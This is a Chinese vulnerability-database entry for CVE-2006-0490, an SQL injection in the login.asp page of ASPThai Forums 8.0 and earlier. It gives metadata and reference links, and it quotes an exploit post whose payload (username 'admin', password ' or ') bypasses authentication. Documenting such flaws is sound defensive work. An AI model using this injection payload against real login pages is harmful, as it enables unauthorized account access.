ASPThai Forums Login.ASP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196213 漏洞类型 SQL注入
发布时间 2006-01-31 更新时间 2006-02-01
CVE编号 CVE-2006-0490 CNNVD-ID CNNVD-200601-381
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006010067
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-381
|漏洞详情
ASPThai.NetASPThaiForums8.0及更早版本的login.asp中存在SQL注入漏洞,远程攻击者可以通过密码字段执行任意SQL命令并绕过登录认证。
|漏洞EXP
ASPThai Forums Version 8.0 & Lower Sql Injection Vulnerability
ASPThai is Prudoct of www.ASPThai.net and Made in Thailand
author : code.shell , <code.shell (at) yahoo (dot) com [email concealed]>

########################################################
Target:

http://www.example.com/[Forum target]/login.asp

username: admin

password: ' or '

########################################################

ASPThai Forums ver 8.5 & Uppers Not vulnerable!

----------------------------------------------------
Web Site: Www.imanOnline.com
E-Mail:info (at) imanOnline (dot) com [email concealed]
----------------------------------------------------
 Emperor Hacking Team

We Are: iM4n - shell.code - Sun.solaris - R$P
----------------------------------------------------
|参考资料

来源:XF
名称:aspthai-login-sql-injection(24359)
链接:http://xforce.iss.net/xforce/xfdb/24359
来源:BID
名称:16404
链接:http://www.securityfocus.com/bid/16404
来源:OSVDB
名称:22790
链接:http://www.osvdb.org/22790
来源:VUPEN
名称:ADV-2006-0372
链接:http://www.frsirt.com/english/advisories/2006/0372
来源:SECTRACK
名称:1015548
链接:http://securitytracker.com/id?1015548
来源:SREASON
名称:381
链接:http://securityreason.com/securityalert/381
来源:SECUNIA
名称:18636
链接:http://secunia.com/advisories/18636
来源:BUGTRAQ
名称:20060127hello
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113837847503661&w=2